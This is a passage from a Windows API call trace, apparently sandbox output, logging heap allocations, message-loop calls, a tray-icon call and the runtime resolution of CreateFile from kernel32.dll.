hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0036.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0036.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0036.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0036.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0036.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0036.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0036.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0036.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0036.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0036.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0036.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0036.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0036.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0036.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0036.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0036.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0036.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0036.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0036.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0036.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0036.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0036.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0036.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0036.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0036.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0036.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0036.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0036.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0036.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0036.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0036.198] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0036.198] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.198] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0036.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0036.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0036.198] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0036.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0036.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0036.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0036.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5f8 [0036.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0036.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0036.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0036.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0036.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0036.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0036.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c8b0 [0036.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0036.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0036.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0036.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0036.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0036.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0036.199] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 1 [0036.199] TranslateMessage (lpMsg=0x6aedfc) returned 0 [0036.199] DispatchMessageW (lpMsg=0x6aedfc) returned 0x0 [0036.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0036.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0036.199] Shell_NotifyIconW (dwMessage=0x1, lpData=0x6ae498) returned 1 [0036.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0036.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0036.200] KillTimer (hWnd=0x50134, uIDEvent=0x1) returned 1 [0036.200] SetTimer (hWnd=0x50134, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0036.200] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0036.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0036.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0036.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0036.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0036.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0036.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0036.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0036.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0036.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0036.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0036.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0036.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0036.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0036.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0036.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0036.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0036.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0036.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0036.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0036.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0036.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0036.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0036.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0036.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0036.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0036.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0036.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0036.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0036.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0036.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0036.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0036.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0036.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0036.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0036.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0036.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0036.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0036.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0036.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0036.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0036.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0036.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0036.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0036.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0036.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0036.202] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0036.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0036.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0036.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0036.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0036.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0036.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0036.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0036.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0036.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0036.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0036.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0036.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0036.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0036.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0036.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0036.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0036.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0036.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0036.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0036.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0036.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0036.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0036.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0036.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0036.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0036.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0036.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0036.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0036.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0036.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0036.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0036.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0036.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0036.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0036.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0036.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0036.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0036.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0036.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0036.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0036.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0036.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0036.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0036.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0036.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0036.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0036.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0036.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0036.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0036.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0036.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0036.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0036.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0036.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0036.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0036.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0036.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0036.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0036.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0036.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0036.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0036.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0036.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0036.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0036.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0036.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0036.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0036.205] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0036.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0036.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0036.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88c9b8 [0036.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88c9b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0036.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0036.205] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0036.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0036.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0036.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0036.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0036.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0036.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0036.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0036.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c9b8 [0036.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88c9b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0036.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0036.206] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0036.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0036.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0036.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0036.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0036.206] 